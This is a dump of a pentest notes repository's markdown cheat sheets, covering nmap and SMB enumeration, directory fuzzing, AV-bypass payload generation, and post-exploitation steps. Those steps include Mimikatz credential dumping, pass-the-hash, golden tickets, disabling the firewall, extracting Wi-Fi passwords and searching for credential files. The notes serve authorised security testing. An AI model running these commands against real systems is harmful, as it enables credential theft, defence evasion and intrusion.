| ## Here is a script that will pull a list of software that is installed on the users system: 12 | 13 | ``` 14 | $listsoftware= Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall 15 | 16 | $names = $listsoftware |foreach-object {Get-ItemProperty $_.PsPath} 17 | 18 | foreach ($name in $names) 19 | { 20 | Write-Host $name.Displayname 21 | } 22 | ``` 23 | 24 | ## WMI: 25 | 26 | - ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt ``` 27 | 28 | ## Reviewing Installed Windows Features 29 | 30 | - ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}``` 31 | 32 | # Wmic 33 | 34 | ## Note: Microsoft has planned to deprecrate this program in new versions of Windows. The commands used can be slow to run but it will return the results it needed: 35 | 36 | - wmic /output:C:\InstalledSoftwareList.txt product get name,version 37 | 38 | ## Saving it to a text file: 39 | 40 | - wmic product get name,version /format:csv > C:\InstalledSoftware.csv -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Mimikatz.md: -------------------------------------------------------------------------------- 1 | # Mimikatz 2 | 3 | Post exploitation commands must be executed from SYSTEM level privileges. 4 | - mimikatz # privilege::debug 5 | - mimikatz # token::whoami 6 | - mimikatz # token::elevate 7 | - mimikatz # lsadump::sam 8 | - mimikatz # sekurlsa::logonpasswords 9 | 10 | ## Pass The Hash 11 | 12 | - mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash 13 | 14 | ## Inject generated TGS key 15 | 16 | - mimikatz # kerberos::ptt 17 | 18 | ## Generating a silver ticket 19 | 20 | AES 256 Key: 21 | 22 | - mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target: 23 | 24 | AES 128 Key: 25 | 26 | - mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target: 27 | 28 | NTLM: 29 | 30 | - mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target: 31 | 32 | 33 | ## Generating a Golden Ticket 34 | 35 | AES 256 Key: 36 | 37 | - mimikatz # kerberos::golden /domain:/sid: /aes256: /user: 38 | 39 | AES 128 Key: 40 | 41 | - mimikatz # kerberos::golden /domain:/sid: /aes128: /user: 42 | 43 | NTLM: 44 | 45 | - mimikatz # kerberos::golden /domain:/sid: /rc4: /user: 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypassing AV.md: -------------------------------------------------------------------------------- 1 | ## Veil Framework: 2 | 3 | Install on Kali: 4 | - apt install veil 5 | - /usr/share/veil/config/setup.sh --force --silent 6 | 7 | Reference: https://github.com/Veil-Framework/Veil 8 | 9 | ## Shellter 10 | 11 | Source: https://www.shellterproject.com/download/ 12 | 13 | - apt install shellter 14 | 15 | 16 | ## Sharpshooter 17 | 18 | Javascript Payload Stageless: 19 | - SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 20 | 21 | Stageless HTA Payload: 22 | 23 | - SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee 24 | 25 | Staged VBS: 26 | 27 | - SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 28 | 29 | Reference: https://github.com/mdsecactivebreach/SharpShooter 30 | 31 | ## Donut: 32 | 33 | Source: https://github.com/TheWover/donut 34 | 35 | ## Vulcan 36 | 37 | Source: https://github.com/praetorian-code/vulcan 38 | 39 | 40 | ## Scarecrow 41 | 42 | Source: https://github.com/optiv/ScareCrow 43 | 44 | In Kali: 45 | 46 | sudo apt install golang 47 | 48 | go get github.com/fatih/color 49 | go get github.com/yeka/zip 50 | go get github.com/josephspurrier/goversioninfo 51 | 52 | go build ScareCrow.go 53 | 54 | ./ScareCrow 55 | 56 | # Resources: 57 | 58 | - https://book.hacktricks.xyz/windows-hardening/av-bypass 59 | - https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates 60 | - 61 | 62 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/1. General Notes.md: -------------------------------------------------------------------------------- 1 | ## Spawn a tty: 2 | 3 | 1. rlwrap nc localhost 80 4 | 5 | 2. rlwrap -r -f . nc 6 | 7 | - socat file:`tty`,raw,echo=0 tcp-listen:12345 8 | - /bin/sh -i 9 | - python -c 'import pty; pty.spawn("/bin/sh")' 10 | - perl -e 'exec "/bin/sh";' 11 | - perl: exec "/bin/sh"; 12 | - ruby: exec "/bin/sh" 13 | - lua: os.execute('/bin/sh') 14 | 15 | ## Priviledge Escalation Scripts: 16 | 17 | Windows: 18 | - Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng 19 | - Sherlock: https://github.com/rasta-mouse/Sherlock 20 | - Powersploit: https://github.com/PowerShellMafia/PowerSploit 21 | - WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS 22 | 23 | Linux: 24 | - Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2 25 | - LinEnum: https://github.com/rebootuser/LinEnum 26 | - UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check 27 | - LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS 28 | 29 | ## Other Resources: 30 | 31 | PowerSharpPack: 32 | - https://github.com/S3cur3Th1sSh1t/PowerSharpPack 33 | 34 | Windows: 35 | - LOLBAS: https://lolbas-project.github.io/# 36 | - Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html 37 | - SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite 38 | - Watson: https://github.com/rasta-mouse/Watson 39 | - WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn 40 | 41 | Linux: 42 | - GTFOBins: https://gtfobins.github.io/ 43 | - g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/1. General Notes.md: -------------------------------------------------------------------------------- 1 | ## Spawn a tty: 2 | 3 | 1. rlwrap nc localhost 80 4 | 5 | 2. rlwrap -r -f . nc 6 | 7 | - socat file:`tty`,raw,echo=0 tcp-listen:12345 8 | - /bin/sh -i 9 | - /bin/bash -i 10 | - python -c 'import pty; pty.spawn("/bin/sh")' 11 | - perl -e 'exec "/bin/sh";' 12 | - perl: exec "/bin/sh"; 13 | - ruby: exec "/bin/sh" 14 | - lua: os.execute('/bin/sh') 15 | 16 | ## Priviledge Escalation Scripts: 17 | 18 | Windows: 19 | - Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng 20 | - Sherlock: https://github.com/rasta-mouse/Sherlock 21 | - Powersploit: https://github.com/PowerShellMafia/PowerSploit 22 | - WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS 23 | - PrivescCheck: https://github.com/itm4n/PrivescCheck 24 | 25 | Linux: 26 | - Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2 27 | - LinEnum: https://github.com/rebootuser/LinEnum 28 | - UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check 29 | - LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS 30 | 31 | ## Other Resources: 32 | 33 | PowerSharpPack: 34 | - https://github.com/S3cur3Th1sSh1t/PowerSharpPack 35 | 36 | Windows: 37 | - LOLBAS: https://lolbas-project.github.io/# 38 | - Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html 39 | - SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite 40 | - Watson: https://github.com/rasta-mouse/Watson 41 | - WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn 42 | 43 | Linux: 44 | - GTFOBins: https://gtfobins.github.io/ 45 | - g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md: -------------------------------------------------------------------------------- 1 | 2 | ## Enumerate SMB: 3 | 4 | Enum4linux: 5 | 6 | - Enum4linux -a 172.21.0.0 7 | 8 | SMBmap: 9 | 10 | - smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password] 11 | - smbmap -H 172.21.0.0 -d [domain] -u "" -p "" 12 | 13 | Nmap: 14 | 15 | - nmap --script smb-* -p 139,445, 172.21.0.0 16 | - nmap --script smb-enum-* -p 139,445, 172.21.0.0 17 | 18 | /usr/share/nmap/scripts/smb-brute.nse 19 | /usr/share/nmap/scripts/smb-enum-domains.nse 20 | /usr/share/nmap/scripts/smb-enum-groups.nse 21 | /usr/share/nmap/scripts/smb-enum-processes.nse 22 | /usr/share/nmap/scripts/smb-enum-services.nse 23 | /usr/share/nmap/scripts/smb-enum-sessions.nse 24 | /usr/share/nmap/scripts/smb-enum-shares.nse 25 | /usr/share/nmap/scripts/smb-enum-users.nse 26 | /usr/share/nmap/scripts/smb-flood.nse 27 | /usr/share/nmap/scripts/smb-ls.nse 28 | /usr/share/nmap/scripts/smb-mbenum.nse 29 | /usr/share/nmap/scripts/smb-os-discovery.nse 30 | /usr/share/nmap/scripts/smb-print-text.nse 31 | /usr/share/nmap/scripts/smb-protocols.nse 32 | /usr/share/nmap/scripts/smb-psexec.nse 33 | /usr/share/nmap/scripts/smb-security-mode.nse 34 | /usr/share/nmap/scripts/smb-server-stats.nse 35 | /usr/share/nmap/scripts/smb-system-info.nse 36 | 37 | 38 | SMBClient: 39 | 40 | - smbclient -L 172.21.0.0 41 | - smbclient //172.21.0.0/tmp 42 | 43 | Impacket SmbClient: 44 | 45 | - /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0 46 | 47 | RPCclient: 48 | 49 | - rpcclient -U "" -N 172.21.0.0 enumdomusers 50 | 51 | Impacket: 52 | 53 | - python3 samdump.py SMB 172.21.0.0 54 | 55 | CrackMapExec: 56 | 57 | - crackmapexec smb -L 58 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth 59 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --share 60 | - crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/General Notes.md: -------------------------------------------------------------------------------- 1 | 2 | ## Enumerate SMB: 3 | 4 | Enum4linux: 5 | 6 | - Enum4linux -a 172.21.0.0 7 | 8 | SMBmap: 9 | 10 | - smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password] 11 | - smbmap -H 172.21.0.0 -d [domain] -u "" -p "" 12 | 13 | Nmap: 14 | 15 | - nmap --script smb-* -p 139,445, 172.21.0.0 16 | - nmap --script smb-enum-* -p 139,445, 172.21.0.0 17 | 18 | /usr/share/nmap/scripts/smb-brute.nse 19 | /usr/share/nmap/scripts/smb-enum-domains.nse 20 | /usr/share/nmap/scripts/smb-enum-groups.nse 21 | /usr/share/nmap/scripts/smb-enum-processes.nse 22 | /usr/share/nmap/scripts/smb-enum-services.nse 23 | /usr/share/nmap/scripts/smb-enum-sessions.nse 24 | /usr/share/nmap/scripts/smb-enum-shares.nse 25 | /usr/share/nmap/scripts/smb-enum-users.nse 26 | /usr/share/nmap/scripts/smb-flood.nse 27 | /usr/share/nmap/scripts/smb-ls.nse 28 | /usr/share/nmap/scripts/smb-mbenum.nse 29 | /usr/share/nmap/scripts/smb-os-discovery.nse 30 | /usr/share/nmap/scripts/smb-print-text.nse 31 | /usr/share/nmap/scripts/smb-protocols.nse 32 | /usr/share/nmap/scripts/smb-psexec.nse 33 | /usr/share/nmap/scripts/smb-security-mode.nse 34 | /usr/share/nmap/scripts/smb-server-stats.nse 35 | /usr/share/nmap/scripts/smb-system-info.nse 36 | 37 | 38 | SMBClient: 39 | 40 | - smbclient -L 172.21.0.0 41 | - smbclient //172.21.0.0/tmp 42 | 43 | Impacket SmbClient: 44 | 45 | - /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0 46 | 47 | RPCclient: 48 | 49 | - rpcclient -U "" -N 172.21.0.0 enumdomusers 50 | 51 | Impacket: 52 | 53 | - python3 samdump.py SMB 172.21.0.0 54 | 55 | CrackMapExec: 56 | 57 | - crackmapexec smb -L 58 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth 59 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --share 60 | - crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Nmap.md: -------------------------------------------------------------------------------- 1 | # Notes: 2 | - remember to run nmap with sudo privlieges or set some linux capabilities to give nmap the required privileges it needs. 3 | 4 | To set Linux Capabilities on Nmap: 5 | ``` 6 | sudo apt-get install libcap2-bin 7 | sudo setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap) 8 | getcap $(which nmap) 9 | nmap --privileged 10 | ``` 11 | 12 | # Default Scans 13 | - nmap -sC -sV 172.21.0.0 14 | - nmap -Pn -sC -sV -p- 172.21.0.0 15 | - nmap -sV -Pn 172.21.0.0 16 | - nmap -T4 -sC -sV 172.21.0.0 17 | - nmap -vv -Pn -A -sC -sS -T 4 -p- 172.21.10.0/24 -oA fullscan 18 | 19 | 20 | # Stealth Scans: 21 | - nmap -sS -sC -sV 172.21.0.0 22 | - nmap -sS -p- 172.21.0.0 23 | 24 | # UDP Scan: 25 | - nmap -sS -sU -Pn -sV 172.21.0.0 26 | - nmap -sU -A --top-ports=20 --version-all 27 | - nmap -sU -A -p 53,67,68,161,162 --version-all 28 | 29 | # Aggressive Scans: 30 | Once you have obtain results from your intial scan, run an aggressive scan in the background to obtain more information from the intial scan you executed: 31 | 32 | - nmap -oA fullscan-aggressive.txt -T4 -vvv --max-rtt-timeout 300ms --max-retries 3 --host-timeout 30m --max-scan-delay 500ms -Pn -p- --version-intensity 1 -iL fullscan.txt 33 | 34 | If scans are not completing or skipping hosts too quickly, change the `--max-rtt-timeout` and `--max-scan-delay` settings. Additionally, for a slower, more complete, stealthier approach, the following can be used: 35 | - nmap -sT -Pn -p- --max-parallelism 1 --max-retries 0 --max-rtt-timeout 1000ms --max-hostgroup 1 -oX nmap_x.x.x.x-all_ports_slow.xml -iL x.x.x.x_Active_IPs.txt 36 | 37 | 38 | TCP: 39 | 40 | # Nmap Scripts: 41 | 42 | Location: /usr/share/nmap/scripts/ 43 | 44 | - nmap --scripts vuln,safe,discovery -oN results.txt target-ip 45 | 46 | # Scans through Socks proxy: 47 | 48 | - nmap --proxies socks4://proxy-ip:8080 target-ip 49 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | ## List all network interfaces, IP, and DNS. 2 | 3 | - ipconfig /all 4 | - Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address 5 | - Get-DnsClientServerAddress -AddressFamily IPv4 | ft 6 | 7 | 8 | ## List all current connections 9 | 10 | netstat -nao 11 | 12 | ## List firewall state and current configuration 13 | 14 | - netsh advfirewall firewall dump 15 | - netsh firewall show state 16 | - netsh firewall show config 17 | 18 | # List firewall's blocked ports 19 | 20 | - $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports 21 | 22 | # Disable firewall 23 | 24 | - netsh firewall set opmode disable (Older Versions of Windows) 25 | - netsh advfirewall set allprofiles state off 26 | 27 | ## List current routing table 28 | 29 | - route print 30 | - Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex 31 | 32 | ## List the ARP table 33 | 34 | - arp -A 35 | - Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State 36 | 37 | ## List all network shares 38 | 39 | - net share 40 | 41 | ## Wifi Passwords: 42 | 43 | Finding the SSID: 44 | - netsh wland show profile 45 | 46 | Obtaining the cleartext password: 47 | ``` 48 | netsh wlan show profile key=clear- cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on 49 | 50 | (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} 51 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/BloodHound.md: -------------------------------------------------------------------------------- 1 | # BloodHound 2 | 3 | ###Source: 4 | 5 | - https://github.com/BloodHoundAD/BloodHound 6 | 7 | ## In Kali: 8 | ``` 9 | $ sudo apt install bloodhound 10 | $ bloodhound 11 | ``` 12 | ## Installing: 13 | ``` 14 | $ cd /opt 15 | $ sudo git clone https://github.com/BloodHoundAD/BloodHound.git 16 | $ sudo wget https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.3/BloodHound-linux-x64.zip 17 | ``` 18 | 19 | Neo4j has to be running for Bloodhound web app to work: 20 | ``` 21 | $ sudo neo4j console 22 | ``` 23 | Set the password if you haven't already. 24 | 25 | Start bloodhound: 26 | ``` 27 | $ sudo ./Bloodhound --no-sandbox 28 | ``` 29 | 30 | ## Pre-Compiled Binaries 31 | 32 | - https://github.com/BloodHoundAD/BloodHound/releases 33 | 34 | ## SharpHound: 35 | 36 | - https://github.com/BloodHoundAD/SharpHound3 37 | 38 | Execute on target: 39 | ``` 40 | C:\> .\SharpHound.exe -c all 41 | ``` 42 | or in Powershell with .ps1 version 43 | 44 | ``` 45 | C:\> import-module .\sharphound.ps1 46 | C:\> invoke-bloodHound -CollectionMethod all -domain -LDAPUser -LDAPPass 47 | ``` 48 | Note: `-domain`, `-LDAPUser`, and `-LDAPPass` are optional and bloodhound will run with only the `-CollectionMethod` flag. 49 | 50 | Other useful sharphound flags: 51 | - `--encryptzip`: allows you to encrypt the file using a random password 52 | - `--zipfilename`: allows you to name the outputted filename so that "bloodhound" isn't in the name in case AV catches it. 53 | 54 | If you want to run SharpHound from a PC that is not joined to the target domain, open a command prompt and run: 55 | ``` 56 | C:\> runas /netonly /user:DOMAIN\USER powershell.exe 57 | ``` 58 | Then run the PS commands listed above as the domain user in the PowerShell context. 59 | 60 | ### Bloodhound for python 61 | Note: Only compatiable with BloodHound 3.0 or newer 62 | 63 | https://github.com/fox-it/BloodHound.py -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/General Notes.md: -------------------------------------------------------------------------------- 1 | ## Spawn a tty: 2 | 3 | 1. rlwrap nc localhost 80 4 | 5 | 2. rlwrap -r -f . nc 6 | 7 | - socat file:`tty`,raw,echo=0 tcp-listen:12345 8 | - /bin/sh -i 9 | - /bin/bash -i 10 | - python -c 'import pty; pty.spawn("/bin/sh")' 11 | - perl -e 'exec "/bin/sh";' 12 | - perl: exec "/bin/sh"; 13 | - ruby: exec "/bin/sh" 14 | - lua: os.execute('/bin/sh') 15 | 16 | ## Priviledge Escalation Scripts: 17 | 18 | Windows: 19 | - Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng 20 | - Sherlock: https://github.com/rasta-mouse/Sherlock 21 | - Powersploit: https://github.com/PowerShellMafia/PowerSploit 22 | - WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS 23 | - PrivescCheck: https://github.com/itm4n/PrivescCheck 24 | 25 | Linux: 26 | - Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2 27 | - LinEnum: https://github.com/rebootuser/LinEnum 28 | - UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check 29 | - LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS 30 | 31 | ## Other Resources: 32 | 33 | PowerSharpPack: 34 | - https://github.com/S3cur3Th1sSh1t/PowerSharpPack 35 | 36 | Windows: 37 | - LOLBAS: https://lolbas-project.github.io/# 38 | - Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html 39 | - Hacktricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation 40 | - SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite 41 | - Watson: https://github.com/rasta-mouse/Watson 42 | - WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn 43 | 44 | Linux: 45 | - GTFOBins: https://gtfobins.github.io/ 46 | - g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 47 | - Hacktricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Sensitive Files to look for: 2 | 3 | ## Windows: 4 | 5 | ``` 6 | %windir%\repair\sam 7 | %windir%\System32\config\RegBack\SAM 8 | %windir%\repair\system 9 | %windir%\repair\software 10 | %windir%\repair\security 11 | %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) 12 | %windir%\iis6.log (5,6 or 7) 13 | %windir%\system32\logfiles\httperr\httperr1.log 14 | C:\sysprep.inf 15 | C:\sysprep\sysprep.inf 16 | C:\sysprep\sysprep.xml 17 | %windir%\Panther\Unattended.xml 18 | C:\inetpub\wwwroot\Web.config 19 | %windir%\system32\config\AppEvent.Evt (Application log) 20 | %windir%\system32\config\SecEvent.Evt (Security log) 21 | %windir%\system32\config\default.sav 22 | %windir%\system32\config\security.sav 23 | %windir%\system32\config\software.sav 24 | %windir%\system32\config\system.sav 25 | %windir%\system32\inetsrv\config\applicationHost.config 26 | %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml 27 | %windir%\System32\drivers\etc\hosts (dns entries) 28 | %windir%\System32\drivers\etc\networks (network settings) 29 | %windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off) 30 | %windir%\unattend.xml 31 | %windir%\Windows\Panther\Unattend.xml 32 | %windir%\Windows\Panther\Unattend\Unattend.xml 33 | %windir%\Windows\system32\sysprep.inf 34 | %windir%\Windows\system32\sysprep\sysprep.xml 35 | C:\ProgramData\Configs\* 36 | C:\Program Files\Windows PowerShell\* 37 | dir c:*vnc.ini /s /b 38 | dir c:*ultravnc.ini /s /b 39 | ``` 40 | 41 | ## Search for contents contained in a file: 42 | 43 | ``` 44 | cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt 45 | findstr /si password *.xml *.ini *.txt *.config 46 | findstr /spin "password" *.* 47 | ``` 48 | 49 | ## Search for a file with a certain filename: 50 | 51 | ``` 52 | dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 53 | where /R C:\ user.txt 54 | where /R C:\ *.ini 55 | ``` 56 | 57 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Sensitive Files to look for: 2 | 3 | ## Windows: 4 | 5 | ``` 6 | %windir%\repair\sam 7 | %windir%\System32\config\RegBack\SAM 8 | %windir%\repair\system 9 | %windir%\repair\software 10 | %windir%\repair\security 11 | %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) 12 | %windir%\iis6.log (5,6 or 7) 13 | %windir%\system32\logfiles\httperr\httperr1.log 14 | C:\sysprep.inf 15 | C:\sysprep\sysprep.inf 16 | C:\sysprep\sysprep.xml 17 | %windir%\Panther\Unattended.xml 18 | C:\inetpub\wwwroot\Web.config 19 | %windir%\system32\config\AppEvent.Evt (Application log) 20 | %windir%\system32\config\SecEvent.Evt (Security log) 21 | %windir%\system32\config\default.sav 22 | %windir%\system32\config\security.sav 23 | %windir%\system32\config\software.sav 24 | %windir%\system32\config\system.sav 25 | %windir%\system32\inetsrv\config\applicationHost.config 26 | %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml 27 | %windir%\System32\drivers\etc\hosts (dns entries) 28 | %windir%\System32\drivers\etc\networks (network settings) 29 | %windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off) 30 | %windir%\unattend.xml 31 | %windir%\Windows\Panther\Unattend.xml 32 | %windir%\Windows\Panther\Unattend\Unattend.xml 33 | %windir%\Windows\system32\sysprep.inf 34 | %windir%\Windows\system32\sysprep\sysprep.xml 35 | C:\ProgramData\Configs\* 36 | C:\Program Files\Windows PowerShell\* 37 | dir c:*vnc.ini /s /b 38 | dir c:*ultravnc.ini /s /b 39 | ``` 40 | 41 | ## Search for contents contained in a file: 42 | 43 | ``` 44 | cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt 45 | findstr /si password *.xml *.ini *.txt *.config 46 | findstr /spin "password" *.* 47 | ``` 48 | 49 | ## Search for a file with a certain filename: 50 | 51 | ``` 52 | dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 53 | where /R C:\ user.txt 54 | where /R C:\ *.ini 55 | ``` 56 | 57 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Directory Fuzzing.md: -------------------------------------------------------------------------------- 1 | # Web Tools for Directory Scanning: 2 | 3 | Dirb: 4 | 5 | - dirb 6 | - dirb 7 | 8 | Gobuster: 9 | 10 | - gobuster dir -u -w /usr/share/wordlists/ 11 | - gobuster dir -u -w /usr/share/wordlists/ -a Firefox (Custom Agent) 12 | - gobuster dir -u -w /usr/share/wordlists/ -x .php,.txt,.html 13 | - gobuster dir -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" 14 | - gobuster dir -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" 15 | - gobuster dir -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" 16 | - gobuster dir -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt 17 | - gobuster dir -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36' 18 | 19 | Wfuzz: 20 | 21 | - wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ 22 | - wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ 23 | - wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests) 24 | 25 | - wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies) 26 | 27 | Dirsearch: 28 | 29 | - dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php 30 | 31 | FFuF: 32 | 33 | - ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 34 | - ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -b "COOKIE VALUE; security=low" -u http://172.21.0.0 35 | - ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -fc 403, 302, 200 36 | - ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "Host: 172.21.0.0" -u http://172.21.0.0 37 | - ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -timeout 5 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/General Notes.md: -------------------------------------------------------------------------------- 1 | SNMP Walk: 2 | 3 | 4 | - snmpwalk -c public -v1 ipaddress 1 5 | - snmpwalk -c private -v1 ipaddress 1 6 | - snmpwalk -c manager -v1 ipaddress 1 7 | 8 | 9 | Nmap: 10 | 11 | - nmap 172.21.0.0 -Pn -sU -p 161 --script= 12 | 13 | /usr/share/nmap/scripts/snmp-brute.nse 14 | /usr/share/nmap/scripts/snmp-hh3c-logins.nse 15 | /usr/share/nmap/scripts/snmp-info.nse 16 | /usr/share/nmap/scripts/snmp-interfaces.nse 17 | /usr/share/nmap/scripts/snmp-ios-config.nse 18 | /usr/share/nmap/scripts/snmp-netstat.nse 19 | /usr/share/nmap/scripts/snmp-processes.nse 20 | /usr/share/nmap/scripts/snmp-sysdescr.nse 21 | /usr/share/nmap/scripts/snmp-win32-services.nse 22 | 